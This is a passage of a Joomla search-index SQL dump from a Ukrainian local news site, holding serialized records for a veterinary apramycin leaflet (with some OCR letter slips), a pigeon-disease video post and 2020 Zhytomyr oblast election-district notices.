протягом 7 д1б; ягнята (вIком до 3 м1сяцIв) — 20-40 мгпрепарату на 1 кг маси тIла (10-20 мг апрам1цину на 1 кг маси тIла) щодобово протягом 3-5 д1б; кролі - 100-200 мг препарату на 1 л питної води, що становить 10-15 мг діючої речовини на 1 кг маси тіла (50-100 мг апрам1цину на 1 л питної води) щодобово протягом 5-8 діб; або100-200 мг препарату на 1 кг корму, що становить 5-10 мг діючої речовини на 1 кг маси тіла (50-100 мг апраміцину на 1 кг корму) щодобово протягом 3 тижнів; курчата, кури-бройлери - 0,5-1 г препарату на 1 л питної води, що становить 25-50 мг діючої речовини на 1 кг маси тіла (250-500 мг апраміцину на 1 л питної води) щодобово протягом 7 діб. Протипоказання Підвищена чутливість до апраміцину. Не застосовувати курям-несучкам, яйця яких призначені для споживання людьми. Препарат не застосовувати котам. Не застосовувати одночасно 3 бета-лактамними антибіотиками у зв\'язку зі зниженням антибактеріального ефекту. Не змішувати з іншими лікарськими засобами. Не застосовувати тваринам у період вагітності та лактації. Застереження Забій тварин на м\'ясо дозволяють через 28 діб (телята) після останнього застосування препарату. Споживання м\'яса поросят, ягнят, кролів та курчат дозволяють безобмежень. Отримане, до зазначеного терміну, м\'ясо утилізують або згодовують непродуктивним тваринам, залежно від висновку лікаря ветеринарної медицини. Перед застосуванням систему поїння необхідно попередньо очистити від іржі. Форма випуску Пластикові банки по 50 г або 100 г, вкриті пластиковими кришками типу «кришка у кришці» 13 встановленим захисним кільцем. Пакувальний матеріал виготовлений 13 поліетилену низької щільності. Зберігання Сухе, темне, недоступне для дітей місце при температурі від 5 °С до 25 °С. , Термін придатності — 2 роки. Готовий розчин 3 препаратом необхідно використати протягом 3 діб, за умови зберігання його у темному місці при температурі від 2 °С до 8 °С. Для застосування у ветеринарній медицині! \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-03 06:49:59\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-03 06:49:59\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4635,'index.php?option=com_content&view=article&id=2465','index.php?option=com_content&view=article&id=2465:likuvannya-ta-profilaktika-infektsijnikh-zakhvoryuvan-v-golubiv&catid=135','Лікування та профілактика інфекційних захворювань в голубів',' На мою думку, кращий лікнеп від Геннадія Лозка, особливо для початківців. ','2020-09-03 10:03:52','58439384ef20c71da73bec677ec6819c',1,1,1,'*','2020-09-03 06:54:45','0000-00-00 00:00:00','2020-09-03 06:54:45','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2465\";s:5:\"alias\";s:63:\"likuvannya-ta-profilaktika-infektsijnikh-zakhvoryuvan-v-golubiv\";s:7:\"summary\";s:1574:\"	<p><strong><span style=\"font-size: 14px;\">На мою думку, кращий лікнеп від Геннадія Лозка, особливо для початківців.</span></strong></p><p><br></p><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/J_S_mrarhRg\" width=\"560\"></iframe></span></p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/z7Dlh7XgshA\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/INf5wk0n29E\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/XKXlY7TfYMo\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/boYH3iyzRzM\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-03 07:03:52\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"9\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:68:\"2465:likuvannya-ta-profilaktika-infektsijnikh-zakhvoryuvan-v-golubiv\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:112:\"/index.php/holuby/informatsiia-holubivnykam/2465-likuvannya-ta-profilaktika-infektsijnikh-zakhvoryuvan-v-golubiv\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2465\";s:5:\"route\";s:123:\"index.php?option=com_content&view=article&id=2465:likuvannya-ta-profilaktika-infektsijnikh-zakhvoryuvan-v-golubiv&catid=135\";s:5:\"title\";s:112:\"Лікування та профілактика інфекційних захворювань в голубів\";s:11:\"description\";s:135:\" На мою думку, кращий лікнеп від Геннадія Лозка, особливо для початківців. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-03 06:54:45\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-03 06:54:45\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4653,'index.php?option=com_content&view=article&id=2468','index.php?option=com_content&view=article&id=2468:informatsiya-pro-kilkist-vibortsiv-yaki-mayut-pravo-golosu-na-viborakh-deputativ-miskoji-silskoji-selishchnoji-radi-ta-pro-viborchu-sistemu-za-yakoyu-provodyatsya-vidpovidni-mistsevi-vibori-25-zhovtnya-202','Інформація про кількість виборців, які мають право голосу на виборах депутатів міської, сільської, селищної ради, та про виборчу систему, за якою проводяться відповідні місцеві вибори 25 жовтня 2020 року за даними ЦВК',' ','2020-09-10 15:53:07','25ba1d7f9ba5ffc67f3643ec1739aafc',1,1,1,'*','2020-09-10 12:45:06','0000-00-00 00:00:00','2020-09-10 12:45:06','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2468\";s:5:\"alias\";s:226:\"informatsiya-pro-kilkist-vibortsiv-yaki-mayut-pravo-golosu-na-viborakh-deputativ-miskoji-silskoji-selishchnoji-radi-ta-pro-viborchu-sistemu-za-yakoyu-provodyatsya-vidpovidni-mistsevi-vibori-25-zhovtnya-2020-roku-za-danimi-tsvk\";s:7:\"summary\";s:349:\"	<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/korrai.jpg\"><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/korrai.jpg\"></a></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/korrai1.jpg\"><img src=\"https://malehus.in.ua/images/stories/korrai1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-10 12:53:07\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"6\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:231:\"2468:informatsiya-pro-kilkist-vibortsiv-yaki-mayut-pravo-golosu-na-viborakh-deputativ-miskoji-silskoji-selishchnoji-radi-ta-pro-viborchu-sistemu-za-yakoyu-provodyatsya-vidpovidni-mistsevi-vibori-25-zhovtnya-2020-roku-za-danimi-tsvk\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:253:\"/index.php/8-novini-2/2468-informatsiya-pro-kilkist-vibortsiv-yaki-mayut-pravo-golosu-na-viborakh-deputativ-miskoji-silskoji-selishchnoji-radi-ta-pro-viborchu-sistemu-za-yakoyu-provodyatsya-vidpovidni-mistsevi-vibori-25-zhovtnya-2020-roku-za-danimi-tsvk\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2468\";s:5:\"route\";s:284:\"index.php?option=com_content&view=article&id=2468:informatsiya-pro-kilkist-vibortsiv-yaki-mayut-pravo-golosu-na-viborakh-deputativ-miskoji-silskoji-selishchnoji-radi-ta-pro-viborchu-sistemu-za-yakoyu-provodyatsya-vidpovidni-mistsevi-vibori-25-zhovtnya-2020-roku-za-danimi-tsvk&catid=8\";s:5:\"title\";s:392:\"Інформація про кількість виборців, які мають право голосу на виборах депутатів міської, сільської, селищної ради, та про виборчу систему, за якою проводяться відповідні місцеві вибори 25 жовтня 2020 року за даними ЦВК\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-10 12:45:06\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-10 12:45:06\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4658,'index.php?option=com_content&view=article&id=2469','index.php?option=com_content&view=article&id=2469:v-zhitomirskij-oblasti-utvoreno-8-viborchikh-okrugiv&catid=8','В Житомирській області утворено 8 виборчих округів',' В Житомирській області утворено 8 виборчих округів, відповідну постанову прийняла обласна виборча комісія 5 вересня 2020 року. Зокрема: Округ № 1 – Житомирська ОТГ Богунський район, орієнтована кількість виборців – 116 418 Округ №2 – Житомирська ОТГ Корольовський район, с. Вереси, орієнтована кількість виборців – 92 078 Округ №3 – Радомишльська міська рада та 7 селищних та 8 сільських ОТГ, орієнтована кількість виборців – 131 204 Округ №4 – Чуднівська та Коростишівська міські ради і 5 селищних та 7 сільських ОТГ, орієнтована кількість виборців – 143 444 Округ №5 – Новоград-Волинська і Баранівська міські ради та 3 селищні і 7 сільських ОТГ, орієнтована кількість виборців – 130 654 Округ №6 – Коростенська, Олевська та Овруцькі міські ради та 2 селищні і 5 сільських ОТГ, орієнтована кількість виборців – 159 548 Округ №7 – Малинська міська рада та 2 селищні ОТГ, орієнтована кількість виборців – 42 059 Округ №8 – Бердичівська та Андрушівська міські ради та 3 селищні і 5 сільських ОТГ, орієнтована кількість виборців – 131 334 ','2020-09-10 16:22:24','2215e2d16b749730d608d4a35e4ed97f',1,1,1,'*','2020-09-10 13:18:22','0000-00-00 00:00:00','2020-09-10 13:18:22','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2469\";s:5:\"alias\";s:52:\"v-zhitomirskij-oblasti-utvoreno-8-viborchikh-okrugiv\";s:7:\"summary\";s:2097:\"	<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/okrug_7.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/okrug_7.jpg\" width=\"618\"></a></p><p>В Житомирській області утворено 8 виборчих округів,  відповідну постанову прийняла обласна виборча комісія 5 вересня 2020 року.  Зокрема:</p><p>Округ № 1 – Житомирська ОТГ Богунський  район, орієнтована кількість виборців – 116 418</p><p>Округ №2 – Житомирська ОТГ Корольовський  район, с. Вереси, орієнтована кількість виборців – 92 078</p><p>Округ №3 – Радомишльська міська рада та 7  селищних та 8 сільських ОТГ, орієнтована кількість виборців – 131 204</p><p>Округ №4 – Чуднівська та Коростишівська  міські ради і 5 селищних та 7 сільських ОТГ, орієнтована кількість виборців –  143 444</p><p>Округ №5 – Новоград-Волинська і Баранівська  міські ради та 3 селищні і 7 сільських ОТГ, орієнтована кількість виборців –  130 654</p><p>Округ №6 – Коростенська, Олевська та  Овруцькі міські ради та 2 селищні і 5 сільських ОТГ, орієнтована кількість виборців  – 159 548</p><p>Округ №7 – Малинська міська рада та 2  селищні ОТГ, орієнтована кількість виборців – 42 059</p><p>Округ №8 – Бердичівська та Андрушівська  міські ради та 3 селищні і 5 сільських ОТГ, орієнтована кількість виборців –  131 334</p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-10 13:22:24\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"